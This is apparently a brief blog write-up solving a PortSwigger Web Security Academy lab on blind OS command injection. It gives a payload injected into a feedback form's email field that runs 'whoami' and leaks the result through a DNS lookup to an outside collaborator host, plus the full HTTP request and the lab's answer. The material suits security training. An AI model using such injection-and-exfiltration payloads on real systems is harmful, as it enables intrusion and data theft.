Skip to content

chojnowski.it

Port Swigger Blind OS command injection with out o 1

Port Swigger Blind OS command injection with out o 1

Solution¶

Open the website: https://0aef00ad04f459018086f3bf00c7003a.web-security-academy.net/feedback¶

https://0aef00ad04f459018086f3bf00c7003a.web-security-academy.net/feedback

Sent payload¶

Payload: ||dig+$(whoami).nqhxykm0kyzkh0frqi5wjjiz4qahy7mw.oastify.com||

---
POST /feedback/submit HTTP/2
Host: 0aef00ad04f459018086f3bf00c7003a.web-security-academy.net
Cookie: session=vp1W7VUKZEkN2UxaYO06y3EFdIUu0vOT
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Origin: https://0aef00ad04f459018086f3bf00c7003a.web-security-academy.net
Referer: https://0aef00ad04f459018086f3bf00c7003a.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

csrf=miSuThsKnF9BORniibkJYFm9fTtzZkjq&name=Jan&email=mail%40wp.pl||dig+$(whoami).nqhxykm0kyzkh0frqi5wjjiz4qahy7mw.oastify.com||&subject=Temat&message=aaa

Input answer¶

Answer: peter-iHHU2S
---
Click "Submit solution" on the https://0aef00ad04f459018086f3bf00c7003a.web-security-academy.net/feedback

Solved¶